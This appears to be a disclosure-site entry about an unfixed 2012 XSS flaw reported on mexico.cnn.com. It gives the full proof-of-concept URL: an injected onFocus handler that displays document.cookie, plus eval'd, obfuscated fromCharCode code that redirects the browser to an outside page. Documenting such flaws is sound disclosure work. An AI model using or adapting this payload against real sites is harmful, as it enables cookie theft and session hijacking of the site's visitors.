Security researcher flexxpoint, has submitted on 15/02/2012 a cross-site-scripting (XSS) vulnerability affecting mexico.cnn.com, which at the time of submission ranked 62 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/02/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/02/2012 |
Date published: 16/02/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: flexxpoint |
Domain: mexico.cnn.com |
Category: XSS |
Pagerank: 62 |
URL: http://mexico.cnn.com/cmx2_buscar.php?q=xss&sort=fecha&user_input=HERE%20HAVE%20A%20%20XSS%22onFocus =confirm(document.cookie);alert(navigator.userAgent);document.write(String.fromCharCode(114,101,100, 100,105,116,46,99,111,109,47,114,47,120,115,115,47));eval(String.fromCharCode(119,105,110,100,111,11 9,46,108,111,99,97,116,105,111,110,46,97,115,115,105,103,110,40,34,104,116,116,112,58,47,47,119,119, 119,46,114,101,100,100,105,116,46,99,111,109,47,114,47,120,115,115,47,34,41)); autofocus%20bad=%22 |
Click here to view the mirror
|
|